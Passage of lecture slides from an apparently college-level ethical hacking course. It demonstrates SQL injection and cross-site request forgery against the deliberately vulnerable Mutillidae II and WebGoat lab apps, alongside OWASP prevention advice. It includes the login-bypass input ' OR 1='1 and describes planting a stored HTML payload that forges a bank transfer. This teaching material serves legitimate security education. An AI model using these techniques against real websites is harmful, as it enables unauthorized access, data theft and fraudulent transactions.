Voila! We have "logged in" using the victims session cookie 127
CIS 76 - Lesson 12

128
And we have full admin rights
CIS 76 - Lesson 12

A1
Injection
(SQL)
130
CIS 76 - Lesson 12

SQL Injection

• Used to attack web applications that store data in a SQL


database.

• Malicious SQL statements are inserted into input fields of


web forms that when executed can bypass authentication,
dump database contents, tamper with data, or delete
tables in the database.

https://en.wikipedia.org/wiki/SQL_injection

https://www.owasp.org/index.php/SQL_Injection

131
CIS 76 - Lesson 12

Injection

OWASP Risk Rating

https://www.owasp.org/index.php/Top_10_2013-A1-Injection 132
CIS 76 - Lesson 12

SQL Injection

https://www.youtube.com/watch?v=_jKylhJtPmI

Time 8:33 133


CIS 76 - Lesson 12

OWASP Injection Prevention

How Do I Prevent 'Injection'?


Preventing injection requires keeping untrusted data separate from
commands and queries.

1. The preferred option is to use a safe API which avoids the use of
the interpreter entirely or provides a parameterized interface. Be
careful with APIs, such as stored procedures, that are
parameterized, but can still introduce injection under the hood.
2. If a parameterized API is not available, you should carefully
escape special characters using the specific escape syntax for
that interpreter. OWASP’s ESAPI provides many of these escaping
routines.
3. Positive or "white list" input validation is also recommended, but
is not a complete defense as many applications require special
characters in their input. If special characters are required, only
approaches 1. and 2. above will make their use safe. OWASP’s
ESAPI has an extensible library of white list input validation
routines.

https://www.owasp.org/index.php/Top_10_2013-A1-Injection 134
CIS 76 - Lesson 12

SQL Injection Example Reference and Credit

https://www.youtube.com/watch?v=RtN8tlR7q-M

Excellent tutorial on SQL Injection using Mutillidae 135


CIS 76 - Lesson 12

SQL Injection

Example Overview:

For this example we will use Mutillidae II on the EH-OWASP VM


to show how SQL commands can be injected into a web
application. The web application does not check and sanitize the
input so anything added will get executed as a SQL query.

The attacker will browse from EH-Kali to the web server on the
EH-OWASP VM.

The EH-Kali browser does not use the Burp Suite proxy in this
example so the proxy configuration in the last example can be
undone ("Pancakes" icon > Preferences > Advanced > Network
> Settings... > Select "No proxy").

136
CIS 76 - Lesson 12

SQL Injection

Example Overview:

For this example we will use Mutillidae II on the EH-OWASP VM


to show how SQL commands can be injected into a web
application. The web application does not check and sanitize the
input so anything added will get executed as a SQL query.

The attacker will browse from EH-Kali to the web server on the
EH-OWASP VM.

137
CIS 76 - Lesson 12

OWASP Mutillidae II

[EH-Kali] http://10.76.xx.101

Disable web
proxy if
configured

138
On your Kali VM, browse to your OWASP VM and head to Mutillidae II
CIS 76 - Lesson 12

OWASP Mutillidae II

Select OWASP 2013 on the left panel 139


CIS 76 - Lesson 12

OWASP Mutillidae II

OWASP 2013 > A1 Injection (SQL) > SQLi - Extract Data > User Info (SQL)

Keep selecting till you get to User Info (SQL) 140


CIS 76 - Lesson 12

OWASP Mutillidae II

141
Click the link to register a new account for yourself
CIS 76 - Lesson 12

OWASP Mutillidae II

142
Add username, password of your choice and any text for the signature
CIS 76 - Lesson 12

OWASP Mutillidae II

143
Account has been created
CIS 76 - Lesson 12

OWASP Mutillidae II

Now that we have created a new user, lets start over and login

144
CIS 76 - Lesson 12

OWASP Mutillidae II

145
Login using your new account
CIS 76 - Lesson 12

OWASP Mutillidae II

146
If successful your account details will be display below
CIS 76 - Lesson 12

OWASP Mutillidae II

To run a text editor


on Kali:

Applications >
Usual applications >
Accessories >
Text Editor

147
Record the URL in a text editor so you can examine the fields
CIS 76 - Lesson 12

OWASP Mutillidae II

Tamper with the password portion of the URL to see if you can get an error 148
CIS 76 - Lesson 12

OWASP Mutillidae II
single quote added

149
Fix the password and add a single quote after it. Try it and observe what happens.
CIS 76 - Lesson 12

OWASP Mutillidae II

Scroll down to see the full error message

Lots off useful information is shown. Log the URL and SQL query in the text editor 150
CIS 76 - Lesson 12

OWASP Mutillidae II

What happens is we use a password of: ' OR 1='1 151


CIS 76 - Lesson 12

OWASP Mutillidae II

That results is a SQL query to dump all the data in the database! 152
CIS 76 - Lesson 12

OWASP Mutillidae II

153
CIS 76 - Lesson 12

OWASP Mutillidae II

154
CIS 76 - Lesson 12

OWASP Mutillidae II

simben76' OR 1='1
You can now login without a
password!

155
CIS 76 - Lesson 12

OWASP Mutillidae II

Or all users and passwords in the


' OR 1='1
database!

156
CIS 76 - Lesson 12

A8
Cross-Site
Request
Forgery (CSRF)
157
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF)

• Another malicious type of attack on a website.

• Also known as a "one-click attack" or "session riding"


attack.

• The browser must already be authenticated on a legitimate


website and is therefore "trusted" by that web application.

• The browser is then tricked into sending unauthorized


malicious (forged) requests to that website.

• This vulnerability can be extremely dangerous ... think


online banking.

https://en.wikipedia.org/wiki/Cross-site_request_forgery
158
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF)

OWASP Risk Rating

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) 159
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF)

https://www.youtube.com/watch?v=vRBihr41JTo

160
CIS 76 - Lesson 12

OWASP CSRF Prevention

How Do I Prevent 'Cross-Site Request Forgery (CSRF)'?


Preventing CSRF usually requires the inclusion of an unpredictable
token in each HTTP request. Such tokens should, at a minimum, be
unique per user session.

1. The preferred option is to include the unique token in a hidden


field. This causes the value to be sent in the body of the HTTP
request, avoiding its inclusion in the URL, which is more prone to
exposure.
2. The unique token can also be included in the URL itself, or a URL
parameter. However, such placement runs a greater risk that the
URL will be exposed to an attacker, thus compromising the secret
token.
3. OWASP’s CSRF Guard can automatically include such tokens in
Java EE, .NET, or PHP apps. OWASP’s ESAPI includes methods
developers can use to prevent CSRF vulnerabilities.
4. Requiring the user to reauthenticate, or prove they are a user
(e.g., via a CAPTCHA) can also protect against CSRF.

161
https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
CIS 76 - Lesson 12

CSRF Example References and Credits

https://www.tutorialspoint.com/security https://www.tutorialspoint.co http://10.76.xx.101/WebGoat/sour


m/security_testing/pdf/cross
_testing/index.htm ce?solution=true
_site_request_forgery.pdf

Lots and lots of PDF of the CSRF Solution page on


hacking tutorials testing tutorial OWASP VM website

162
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF)

Example Overview:

In this WebGoat example malicious html code is inserted into a


post on a forum-like web application. This code is stored in the
database and isn't rendered until a user reads the post. When
the malicious code is activated the browser will be tricked into
sending an unauthorized (forged) request to another website.
The browser thinks it is getting an image file to display however
there is no image.

We will browse to the WebGoat application using Firefox on EH-


Kali. Burp Suite will be used on EH-Kali as a web proxy so we
can intercept and monitor every request the browser makes.

163
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite on EH-Kali-xx

Accept the license


agreement

Use the current


version 164
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Select "Temporary project" and click the Next button 165


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Select "Use Burp defaults" and click the Start Burp button 166
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Click the Proxy tab 167


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

168
Click the Options tab and verify Burp Suite is listening on port 8080
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

169
Click the Intercept tab to monitor browser requests
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

170
Switch to Workspace 2 and run Firefox
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

171
Select Preferences
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

172
Advanced > Network > Settings...
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

This will configure


the browser to use
the Burp Suite as a
proxy service.

This enables the


Burp Suite to
intercept and
monitor all Firefox
browser requests.

173
Configure the proxy service as shown above
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Firefox browse to http://10.76.xx.101

Scroll
down a
little

We are
using Pod
5 for this
example

From your Kali VM, browse to your OWASP VM and head to WebGoat
174
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Back on workspace 1 click the Forward button on Burp Suite


175
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Login to WebGoat with username and password = guest 176


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click forward to continue 177


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Scroll
down a
bit

178
In workspace 1 start WebGoat
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

179
Click Forward on Burp Suite to continue
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Scroll
down a
little

180
Navigate on the left panel to Cross Site Request Forgery (CSRF)
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

181
Click Forward on Burp Suite to continue
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

182
Fill out the form and click the Submit button
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

183
Click Forward on Burp Suite to continue
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Terminal
scp xxxxxx76@opus-ii:../depot/lesson12/csrf/* .
cat payload

184
In workspace 3 open a terminal and copy the payload file on Opus-II
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Update to your
pod number

Create new message using the malicious HTML payload (copy an paste
from terminal) to transfer bank funds 185
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue 186


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue 187


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Select the message with the malicious payload


188
CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


Burp Suite on EH-Kali-xx

Click Forward on Burp Suite to continue 189


CIS 76 - Lesson 12

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Note the GET request containing the malicious URL which 190
requests the transfer the bank funds to attacker
CIS 76 - Lesson 12

When finished using the Burp Suite,


disable the proxy settings in your
browser:

"Pancakes" icon
> Preferences
> Advanced
> Network
> Settings...
> Select "No proxy"
191
CIS 76 - Lesson 12

Assignment

192
CIS 76 - Lesson 12

Lab 10 - the LAST one!

193
CIS 76 - Lesson 12

Wrap up

194
CIS 76 - Lesson 12

Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.

Quiz questions for next class:

• Using ' OR 1='1 as the password to log into a web application is what
kind of attack?

• What the difference between stored and reflected cross-site scripting?

• The Burp Suite can be used as a HTTP proxy server (T or F)?

195
CIS 76 - Lesson 12

Backup
196

You might also like